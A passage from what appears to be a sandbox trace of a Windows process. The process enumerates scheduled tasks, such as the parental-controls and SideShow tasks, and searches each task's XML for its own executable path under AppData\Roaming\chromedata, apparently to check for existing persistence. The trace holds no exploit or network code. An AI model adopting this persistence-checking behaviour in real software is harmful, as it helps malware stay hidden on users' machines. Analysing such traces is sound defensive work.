	[0073.367] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\Shell\\WindowsParentalControls</URI>\r\n    <Source>$(@%SystemRoot%\\System32\\wpcumi.dll,-300)</Source>\r\n    <Author>$(@%SystemRoot%\\System32\\wpcumi.dll,-301)</Author>\r\n    <Description>$(@%SystemRoot%\\System32\\wpcumi.dll,-302)</Description>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>false</Enabled>\r\n      <Delay>PT1S</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <Compatibility>http://schemas.microsoft.com/windows/2004/02/mit/task</Compatibility>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>5</Count>\r\n    </RestartOnFailure>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-11</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{DFA14C43-F385-4170-99CC-1B7765FA0E4A}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.367] IUnknown:Release (This=0x55ff38) returned 0x0
	[0073.367] IRegisteredTaskCollection:get_Item (in: This=0x55fe50, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x2, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff38) returned 0x0
	[0073.367] IRegisteredTask:get_Name (in: This=0x55ff38, pName=0x128e3c | out: pName=0x128e3c*="WindowsParentalControlsMigration") returned 0x0
	[0073.368] IRegisteredTask:get_Xml (in: This=0x55ff38, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\Shell\\WindowsParentalControlsMigration</URI>\r\n    <Source>$(@%SystemRoot%\\System32\\wpcmig.dll,-300)</Source>\r\n    <Author>$(@%SystemRoot%\\System32\\wpcmig.dll,-301)</Author>\r\n    <Description>$(@%SystemRoot%\\System32\\wpcmig.dll,-302)</Description>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT1S</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <Compatibility>http://schemas.microsoft.com/windows/2004/02/mit/task</Compatibility>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>1</Count>\r\n    </RestartOnFailure>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"System\">\r\n      <GroupId>S-1-5-18</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"System\">\r\n    <ComHandler>\r\n      <ClassId>{343D770D-7788-47c2-B62A-B7C4CED925CB}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.370] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\Shell\\WindowsParentalControlsMigration</URI>\r\n    <Source>$(@%SystemRoot%\\System32\\wpcmig.dll,-300)</Source>\r\n    <Author>$(@%SystemRoot%\\System32\\wpcmig.dll,-301)</Author>\r\n    <Description>$(@%SystemRoot%\\System32\\wpcmig.dll,-302)</Description>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT1S</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <Compatibility>http://schemas.microsoft.com/windows/2004/02/mit/task</Compatibility>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>1</Count>\r\n    </RestartOnFailure>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"System\">\r\n      <GroupId>S-1-5-18</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"System\">\r\n    <ComHandler>\r\n      <ClassId>{343D770D-7788-47c2-B62A-B7C4CED925CB}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.371] IUnknown:Release (This=0x55ff38) returned 0x0
	[0073.371] IUnknown:Release (This=0x55fe50) returned 0x0
	[0073.371] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe50) returned 0x0
	[0073.371] ITaskFolderCollection:get_Count (in: This=0x55fe50, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.371] IUnknown:Release (This=0x55fe50) returned 0x0
	[0073.371] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.372] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x1e, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.372] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe50) returned 0x0
	[0073.373] IRegisteredTaskCollection:get_Count (in: This=0x55fe50, pCount=0x128e30 | out: pCount=0x128e30*=4) returned 0x0
	[0073.373] IRegisteredTaskCollection:get_Item (in: This=0x55fe50, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff38) returned 0x0
	[0073.373] IRegisteredTask:get_Name (in: This=0x55ff38, pName=0x128e3c | out: pName=0x128e3c*="AutoWake") returned 0x0
	[0073.373] IRegisteredTask:get_Xml (in: This=0x55ff38, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;LS)(A;;FR;;;AU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)</Source>\r\n    <Author>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)</Author>\r\n    <URI>Microsoft\\Windows\\SideShow\\AutoWake</URI>\r\n    <Date>2005-10-01T00:00:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1201)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT1M</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n      <LogonType>InteractiveToken</LogonType>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings />\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{E51DFD48-AA36-4B45-BB52-E831F02E8316}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.375] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;LS)(A;;FR;;;AU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)</Source>\r\n    <Author>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)</Author>\r\n    <URI>Microsoft\\Windows\\SideShow\\AutoWake</URI>\r\n    <Date>2005-10-01T00:00:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1201)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT1M</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n      <LogonType>InteractiveToken</LogonType>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings />\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{E51DFD48-AA36-4B45-BB52-E831F02E8316}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.375] IUnknown:Release (This=0x55ff38) returned 0x0
	[0073.375] IRegisteredTaskCollection:get_Item (in: This=0x55fe50, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x2, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff38) returned 0x0
	[0073.375] IRegisteredTask:get_Name (in: This=0x55ff38, pName=0x128e3c | out: pName=0x128e3c*="GadgetManager") returned 0x0
	[0073.375] IRegisteredTask:get_Xml (in: This=0x55ff38, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;FRFX;;;IU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)</Source>\r\n    <Author>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)</Author>\r\n    <URI>Microsoft\\Windows\\SideShow\\GadgetManager</URI>\r\n    <Date>2005-10-01T00:00:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1203)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>false</Enabled>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Creator\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings />\r\n    <MultipleInstancesPolicy>Queue</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"Creator\">\r\n    <ComHandler>\r\n      <ClassId>{FF87090D-4A9A-4f47-879B-29A80C355D61}</ClassId>\r\n      <Data><![CDATA[$(Arg0)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.377] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;FRFX;;;IU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)</Source>\r\n    <Author>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)</Author>\r\n    <URI>Microsoft\\Windows\\SideShow\\GadgetManager</URI>\r\n    <Date>2005-10-01T00:00:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1203)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>false</Enabled>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Creator\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings />\r\n    <MultipleInstancesPolicy>Queue</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"Creator\">\r\n    <ComHandler>\r\n      <ClassId>{FF87090D-4A9A-4f47-879B-29A80C355D61}</ClassId>\r\n      <Data><![CDATA[$(Arg0)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.378] IUnknown:Release (This=0x55ff38) returned 0x0
	[0073.378] IRegisteredTaskCollection:get_Item (in: This=0x55fe50, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x3, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff38) returned 0x0
	[0073.378] IRegisteredTask:get_Name (in: This=0x55ff38, pName=0x128e3c | out: pName=0x128e3c*="SessionAgent") returned 0x0
	[0073.378] IRegisteredTask:get_Xml (in: This=0x55ff38, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;GRGWGX;;;IU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)</Source>\r\n    <Author>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)</Author>\r\n    <URI>Microsoft\\Windows\\SideShow\\SessionAgent</URI>\r\n    <Date>2005-10-01T00:00:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1202)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT15S</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Creator\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings />\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"Creator\">\r\n    <ComHandler>\r\n      <ClassId>{45F26E9E-6199-477F-85DA-AF1EDfE067B1}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.380] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;GRGWGX;;;IU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)</Source>\r\n    <Author>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)</Author>\r\n    <URI>Microsoft\\Windows\\SideShow\\SessionAgent</URI>\r\n    <Date>2005-10-01T00:00:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1202)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT15S</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Creator\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings />\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"Creator\">\r\n    <ComHandler>\r\n      <ClassId>{45F26E9E-6199-477F-85DA-AF1EDfE067B1}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.380] IUnknown:Release (This=0x55ff38) returned 0x0
	[0073.380] IRegisteredTaskCollection:get_Item (in: This=0x55fe50, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x4, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff38) returned 0x0
	[0073.380] IRegisteredTask:get_Name (in: This=0x55ff38, pName=0x128e3c | out: pName=0x128e3c*="SystemDataProviders") returned 0x0
	[0073.380] IRegisteredTask:get_Xml (in: This=0x55ff38, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;GRGWGX;;;LS)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)</Source>\r\n    <Author>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)</Author>\r\n    <URI>Microsoft\\Windows\\SideShow\\SystemDataProviders</URI>\r\n    <Date>2005-10-01T00:00:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1200)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT30S</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n      <LogonType>InteractiveToken</LogonType>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings />\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{7CCA6768-8373-4D28-8876-83E8B4E3A969}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.383] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;GRGWGX;;;LS)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)</Source>\r\n    <Author>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)</Author>\r\n    <URI>Microsoft\\Windows\\SideShow\\SystemDataProviders</URI>\r\n    <Date>2005-10-01T00:00:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1200)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT30S</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n      